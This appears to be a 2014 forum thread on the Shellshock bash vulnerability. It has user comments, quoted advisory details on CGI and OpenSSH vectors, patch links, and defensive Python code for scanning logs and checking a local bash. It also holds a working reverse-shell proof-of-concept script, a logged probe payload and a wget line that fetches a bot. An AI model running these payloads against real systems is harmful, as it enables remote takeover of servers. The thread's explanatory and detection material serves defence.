Hackers exploit Shellshock bug

Bleh. With so little data to go on as to:

1. What the actual vulnerability is
2. What combination of software is needed for you to be vulnerable
3. Who has been compromised
4. Which devices are vulnerable

this smells more like media sensation than anything else.
 
Bleh. With so little data to go on as to:

1. What the actual vulnerability is
2. What combination of software is needed for you to be vulnerable
3. Who has been compromised
4. Which devices are vulnerable

this smells more like media sensation than anything else.
1 is available
2 anyone with more than an IQ of 10 can figure out if you are in the IT field
3 which is why they are scanning...duh
4 shouldn't be too difficult to figure out either, just use the data from #3
 
Bleh. With so little data to go on as to:

1. What the actual vulnerability is
2. What combination of software is needed for you to be vulnerable
3. Who has been compromised
4. Which devices are vulnerable

this smells more like media sensation than anything else.

Not at all, the information is all out there and available. They're very clear on what is vulnerable and how it impacts the system. I patched everything yesterday already. 112 servers :/ Though most of my machines that could be compromised were local firewalls and file servers.
 
My biggest concern here is routers. They possibly can be exploited, are hard to update and almost never updated... and this worm is specifically searching for them :/
 
Be afraid

Don't ignore this bug! Any CGI program has the HTTP headers in environment variables, e.g. User-Agent. You need a single legacy CGI program on your webserver and you will get owned. A one-line wget command is enough to do it.

I started seeing attempts to exploit this bug in my logs from early yesterday morning.

The biggest risk is that a lot of the older Ubuntu boxes no longer get patches and those are the ones more likely to have a cgi app.
 
Vapourworm

Jaime Blasco, labs director at AlienVault, said he had uncovered the same piece of malware, as well as a second worm seeking to exploit ..
What a pity he didn't say what avenue of attack this vapourworm is using.
 
What a pity he didn't say what avenue of attack this vapourworm is using.

I've seen around 3000 hits on my servers this morning trying to exploit this bug through User-Agent, I assume there were even more trying using HTTP headers that don't get logged. It's safe to assume there is a worm doing the rounds.

Make sure bash is updated or you will be sorry.

Typical line from my apache logs:
193.107.16.123 - - [26/Sep/2014:05:31:53 +0200] "GET /cgi-bin/test HTTP/1.0" 404 484 "-" "() { :;}; /bin/bash -c \"id\r\""
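The log line above is enough to build a detector for these scans. What follows is an added example, not code from this thread: it parses Apache combined-format lines, unescapes the quoted fields, URL-decodes the request target, flags any field that carries the "() {" function prefix bash looks for, and pulls out the trailing command the scanner wanted run. The first sample line is the one posted above; the other two are constructed for the example, and the field names and finding format are this example's own.

```python
"""Scan Apache combined-format log lines for Shellshock probes.
Added example, not code from the thread.  SAMPLE_LOG[0] is the line posted
above; the other two lines are constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain \" and other Apache escapes, so escaped pairs are matched too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)
# The prefix bash treats as an exported function definition.  Whitespace
# variants are flagged as well so a sloppy scanner is not missed.
MAGIC_RE = re.compile(r"\(\s*\)\s*\{")
# Everything after the function body is what a vulnerable bash would execute.
TRAILER_RE = re.compile(r"\(\s*\)\s*\{.*?\}\s*;?\s*(.*)", re.S)

_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", '"': '"', "\\": "\\"}


def unescape_apache(value: str) -> str:
    r"""Undo the escaping Apache applies to logged strings (\", \\, \n, \r, \t, \xHH)."""
    def repl(m) -> str:
        token = m.group(1)
        if token[0] == "x" and len(token) == 3:
            return chr(int(token[1:], 16))
        return _ESCAPES.get(token, token)
    return re.sub(r"\\(x[0-9a-fA-F]{2}|.)", repl, value)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    for key in ("request", "referer", "ua"):
        rec[key] = unescape_apache(rec[key])
    return rec


def cgi_visible_fields(rec: Dict[str, str]) -> Dict[str, str]:
    """The request pieces a CGI gateway exports to the script, keyed by the
    environment variable they land in.  Path and query are URL-decoded here so
    an encoded payload is caught whichever gateway does the decoding."""
    parts = rec["request"].split(" ")
    target = parts[1] if len(parts) > 1 else ""
    protocol = parts[2] if len(parts) > 2 else ""
    path, _, query = target.partition("?")
    return {
        "REQUEST_METHOD": parts[0],
        "PATH_INFO": unquote(path),
        "QUERY_STRING": unquote(query),
        "SERVER_PROTOCOL": protocol,
        "HTTP_REFERER": rec["referer"],
        "HTTP_USER_AGENT": rec["ua"],
    }


def extract_command(value: str) -> Optional[str]:
    """Return the command that trails the function body, or None if there is none."""
    m = TRAILER_RE.search(value)
    return m.group(1).strip() if m else None


def scan(lines: List[str]) -> List[Dict[str, Optional[str]]]:
    """One finding per (line, variable) whose value carries the function prefix."""
    findings: List[Dict[str, Optional[str]]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for var, value in cgi_visible_fields(rec).items():
            if MAGIC_RE.search(value):
                findings.append({"ip": rec["ip"], "time": rec["time"],
                                 "variable": var, "command": extract_command(value)})
    return findings


SAMPLE_LOG = [
    # The line posted in the thread above.
    '193.107.16.123 - - [26/Sep/2014:05:31:53 +0200] "GET /cgi-bin/test HTTP/1.0" 404 484 "-" "() { :;}; /bin/bash -c \\"id\\r\\""',
    # Constructed: the same payload URL-encoded in the query string.
    '198.51.100.7 - - [26/Sep/2014:06:02:11 +0200] "GET /cgi-bin/status?x=%28%29%20%7B%20%3A%3B%7D%3B%20%2Fusr%2Fbin%2Fwget%20http%3A%2F%2F198.51.100.7%2Fbot HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    # Constructed: braces in the referer but no function prefix, must not be flagged.
    '203.0.113.9 - - [26/Sep/2014:06:05:40 +0200] "GET /index.html HTTP/1.1" 200 5120 "http://example.com/{id}" "curl/7.37.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} via {f['variable']}: {f['command']}")
```

Only fields Apache actually logs are visible this way; a probe sent in a header that the LogFormat does not record (Host, a custom header) leaves no trace here, which is why the poster assumes more hits than the User-Agent count shows. For those, log the extra headers or inspect at the CGI boundary.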
 
The technical details of the vulnerability follow.

Bash supports exporting not just shell variables, but also shell
functions to other bash instances, via the process environment to
(indirect) child processes. Current bash versions use an environment
variable named by the function name, and a function definition
starting with “() {” in the variable value to propagate function
definitions through the environment. The vulnerability occurs because
bash does not stop after processing the function definition; it
continues to parse and execute shell commands following the function
definition. For example, an environment variable setting of

VAR=() { ignored; }; /bin/id

will execute /bin/id when the environment is imported into the bash
process. (The process is in a slightly undefined state at this point.
The PATH variable may not have been set up yet, and bash could crash
after executing /bin/id, but the damage has already happened at this
point.)

The fact that an environment variable with an arbitrary name can be
used as a carrier for a malicious function definition containing
trailing commands makes this vulnerability particularly severe; it
enables network-based exploitation.



So far, HTTP requests to CGI scripts have been identified as the major
attack vector.

A typical HTTP request looks like this:

GET /path?query-param-name=query-param-value HTTP/1.1
Host: www.example.com
Custom: custom-header-value

The CGI specification maps all parts to environment variables. With
Apache httpd, the magic string “() {” can appear in these places:

* Host (“www.example.com”, as REMOTE_HOST)
* Header value (“custom-header-value”, as HTTP_CUSTOM in this example)
* Server protocol (“HTTP/1.1”, as SERVER_PROTOCOL)

The user name embedded in an Authorization header could be a vector as
well, but the corresponding REMOTE_USER variable is only set if the
user name corresponds to a known account according to the
authentication configuration, and a configuration which accepts the
magic string appears somewhat unlikely.

In addition, with other CGI implementations, the request method
(“GET”), path (“/path”) and query string
(“query-param-name=query-param-value”) may be vectors, and it is
conceivable for “query-param-value” as well, and perhaps even
“query-param-name”.

The other vector is OpenSSH, either through AcceptEnv variables, TERM
or SSH_ORIGINAL_COMMAND.

Other vectors involving different environment variables set by
additional programs are expected.

Again, please do not disclose this issue to customers or the general
public until the embargo has expired.


Proof-of-concept code
#
# CVE-2014-6271 cgi-bin reverse shell
#
import http.client
import sys

if len(sys.argv) < 4:
    print("Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0])
    print("Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0])
    sys.exit(0)

conn = http.client.HTTPConnection(sys.argv[1])
# Function definition followed by a trailing command.  The CGI gateway exports
# the "test" header as HTTP_TEST; a vulnerable bash runs the trailing command
# while importing that variable and connects back to <attackhost/IP>.
reverse_shell = "() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
           "test": reverse_shell}
conn.request("GET", sys.argv[2], headers=headers)
res = conn.getresponse()
print(res.status, res.reason)
data = res.read()
print(data)


BASH BUG PATCH
Disabling any CGI scripts that call on the shell is recommended, but it does not fully mitigate the vulnerability. Many of the major operating system and Linux distribution vendors have released new bash packages today, including:
Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution
CentOS (versions 5 through 7) - http://lists.centos.org/pipermail/centos/2014-September/146099.html
Ubuntu 10.04 LTS, 12.04 LTS, and 14.04 LTS - http://www.ubuntu.com/usn/usn-2362-1/
Debian - https://lists.debian.org/debian-security-announce/2014/msg00220.html

If your system is vulnerable to the bash bug, you are strongly recommended to upgrade your bash package as soon as possible.
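To follow the path the advisory describes end to end (request header, CGI environment variable, bash importing it) and to check the local bash once the package above is installed, here is an added example in Python; it is not code from the advisory or from this thread. It builds the environment a CGI gateway hands to a script, lists the variables bash will try to parse as function definitions, then runs bash with that environment the way a CGI handler would be started. A marker string is echoed only if bash executes the command that trails the function body. The header names, the marker and the sample request are constructed for this example.

```python
"""Request -> CGI environment -> bash, and a local CVE-2014-6271 check.
Added example, not code from the advisory.  MARKER, the header names and the
sample request are constructed for illustration."""
import shutil
import subprocess
from typing import Dict, List, Tuple

# Assumed marker: it reaches stdout only if bash ran the trailing command.
MARKER = "SHELLSHOCK_TRAILING_COMMAND_RAN"
# The shape from the advisory: a function definition followed by a command.
PROBE = "() { :;}; echo " + MARKER


def cgi_environment(method: str, path: str, query: str, protocol: str,
                    headers: Dict[str, str], remote_addr: str) -> Dict[str, str]:
    """Build the environment a CGI gateway passes to the script (RFC 3875 names).
    Every request header becomes HTTP_<NAME>, upper-cased with '-' turned into '_',
    which is how User-Agent and custom headers reach bash unchanged."""
    env = {
        "PATH": "/usr/bin:/bin",
        "GATEWAY_INTERFACE": "CGI/1.1",
        "REQUEST_METHOD": method,
        "SCRIPT_NAME": path,
        "QUERY_STRING": query,
        "SERVER_PROTOCOL": protocol,
        "REMOTE_ADDR": remote_addr,
    }
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def tainted_variables(env: Dict[str, str]) -> List[str]:
    """Variables whose value starts with the prefix bash treats as an exported
    function definition when it imports the environment."""
    return sorted(name for name, value in env.items() if value.startswith("() {"))


def bash_available() -> bool:
    return shutil.which("bash") is not None


def run_cgi_under_bash(env: Dict[str, str]) -> Tuple[bool, str]:
    """Start bash as a CGI gateway starts a shell-script handler, with the
    request-derived environment.  The handler only prints 'ok'; if MARKER shows
    up, bash executed the command trailing the function body while importing the
    environment, i.e. it is vulnerable to CVE-2014-6271."""
    bash = shutil.which("bash")
    if bash is None:
        raise RuntimeError("bash not found on this host")
    proc = subprocess.run([bash, "-c", "echo ok"], env=env,
                          capture_output=True, text=True, timeout=10)
    return MARKER in proc.stdout, proc.stdout + proc.stderr


def probe_local_bash() -> Dict[str, object]:
    """Send the probe through three header vectors: Host, User-Agent (the one
    the scans in the logs use) and a custom header."""
    headers = {"Host": PROBE, "User-Agent": PROBE, "X-Custom": PROBE}
    env = cgi_environment("GET", "/cgi-bin/test", "", "HTTP/1.0", headers, "192.0.2.10")
    fired, output = run_cgi_under_bash(env)
    return {"tainted": tainted_variables(env), "vulnerable": fired, "output": output.strip()}


if __name__ == "__main__":
    result = probe_local_bash()
    print("variables bash will inspect:", ", ".join(result["tainted"]))
    print("vulnerable:", result["vulnerable"])
    print("handler output:", result["output"])
```

On a patched bash the handler prints only ok (a first-round patch may also warn on stderr that it is ignoring the function definition attempt); on an unpatched one the marker appears before it. Run it before and after installing the vendor package to confirm the upgrade took effect on the bash your CGI handlers actually invoke.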
 
Bleh. With so little data to go on as to:

1. What the actual vulnerability is
2. What combination of software is needed for you to be vulnerable
3. Who has been compromised
4. Which devices are vulnerable

this smells more like media sensation than anything else.

just JFGI
Google is your friend, or read above
 